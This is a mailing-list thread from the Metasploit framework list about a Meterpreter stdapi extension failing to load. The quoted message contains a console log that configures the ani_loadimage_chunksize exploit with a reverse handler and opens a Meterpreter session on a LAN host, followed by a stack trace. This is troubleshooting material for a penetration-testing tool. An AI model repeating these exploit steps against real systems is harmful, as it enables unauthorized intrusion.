[framework] Looking for advice on MSF3 meterpreter stdapi error

mmiller at hick.org mmiller at hick.org
Fri May 4 12:10:59 CDT 2007 

This definitely looks like some sort of bug.  Can you take the following
steps:

1. setg LogLevel 3
2. restart msfconsole
3. re-run the exploit

I'd like to see if there is an exception being generated behind the
scenes that isnt' showing up for some reason.  By default, the stdapi
extension should be loaded when Meterpreter starts up, so something
fishy is going on.

On Thu, May 03, 2007 at 04:45:33PM -0400, jlbrown1980 wrote:
> Alright here is the printout from my console.  I'm running the latest
> Linux kernel and successfully downloaded and installed all ruby + gems
> components.
> 
> Getting ready to run the exploit...
> 
> msf exploit(ani_loadimage_chunksize) > show options
> 
> Module options:
> 
>    Name     Current Setting  Required  Description
>    ----     ---------------  --------  -----------
>    SRVHOST  192.168.1.105    yes       The local host to listen on.
>    SRVPORT  4001                     yes       The local port to listen
> on.
>    URIPATH                               no        The URI to use for
> this exploit (default is random)
> 
> 
> Payload options:
> 
>    Name      Current Settings
> Required                     Description                 
> 
>    DLL       /usr/local/msf/framework-3.0/data/meterpreter/metsrv.dll
> yes                                   The local path to the DLL to
> upload
>    EXITFUNC  process
> yes                                    Exit technique: seh, thread,
> process
>    LHOST       192.168.1.105
> yes                                   The local address
>    LPORT        4000
> yes                                   The local port
> 
> 
> Exploit target:
> 
>    Id  Name
>    --  ----
>    0   Automatic
> 
> 
> msf exploit(ani_loadimage_chunksize) > set SRVPORT 8081
> SRVPORT => 8081
> msf exploit(ani_loadimage_chunksize) > set LPORT 8080
> LPORT => 8080
> msf exploit(ani_loadimage_chunksize) > exploit
> [*] Started reverse handler
> [*] Using URL: http://192.168.1.105:8081/R0i5yStGKTa9
> [*] Server started.
> [*] Exploit running as background job.
> msf exploit(ani_loadimage_chunksize) >
> [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
> [*] Sending stage (2834 bytes)
> [*] Sleeping before handling stage...
> [*] Uploading DLL (81931 bytes)...
> [*] Upload completed.
> [*] Meterpreter session 1 opened (192.168.1.105:8080 ->
> 192.168.1.103:4711)
> sessions -i 1
> [*] Starting interaction with 1...
> 
> 
> Checking to see what commands are available...
> meterpreter > ?
> 
> 
> Core Commands
> =============
> 
>     Command       Description
>     -------       -----------
>     ?             Help menu
>     channel       Displays information about active channels
>     close         Closes a channel
>     exit          Terminate the meterpreter session
>     help          Help menu
>     interact      Interacts with a channel
>     irb           Drop into irb scripting mode
>     migrate       Migrate the server to another process
>     quit          Terminate the meterpreter session
>     read          Reads data from a channel
>     run           Executes a meterpreter script
>     use           Load a one or more meterpreter extensions
>     write         Writes data to a channel
> 
> So no extensions have been loaded; I try to manually load stdapi and
> receive this
> 
> meterpreter > use stdapi
> Loading extension stdapi...[-]
> failure: No response was received to the core_loadlib
> request. /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/client_core.rb:156:in `use'
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console/command_dispatc
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console/command_dispatc
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console/command_dispatc
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:230:in
> `send'
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:230:in
> `run_com
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console.rb:94:in `run_c
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:196:in
> `run_sin
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:191:in
> `each'
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:191:in
> `run_sin
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console.rb:60:in `inter
> /usr/local/msf/framework-3.0/lib/rex/ui/text/shell.rb:121:in `call'
> /usr/local/msf/framework-3.0/lib/rex/ui/text/shell.rb:121:in `run'
> /usr/local/msf/framework-3.0/lib/rex/post/meterpreter/ui/console.rb:58:in `inter
> /usr/local/msf/framework-3.0/lib/msf/base/sessions/meterpreter.rb:170:in
> `_inter
> /usr/local/msf/framework-3.0/lib/rex/ui/interactive.rb:48:in `interact'
> /usr/local/msf/framework-3.0/lib/msf/ui/console/command_dispatcher/core.rb:671:i
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:230:in
> `send'
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:230:in
> `run_com
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:196:in
> `run_sin
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:191:in
> `each'
> /usr/local/msf/framework-3.0/lib/rex/ui/text/dispatcher_shell.rb:191:in
> `run_sin
> /usr/local/msf/framework-3.0/lib/rex/ui/text/shell.rb:125:in `run'
> /usr/local/bin/msfconsole:77
> 
> Also SVN  reports 4859 for current framework version
> If anyone has any suggestions at all how to get passed this point,
> please shoot them my way.
> Thanks for reading!

More information about the framework mailing list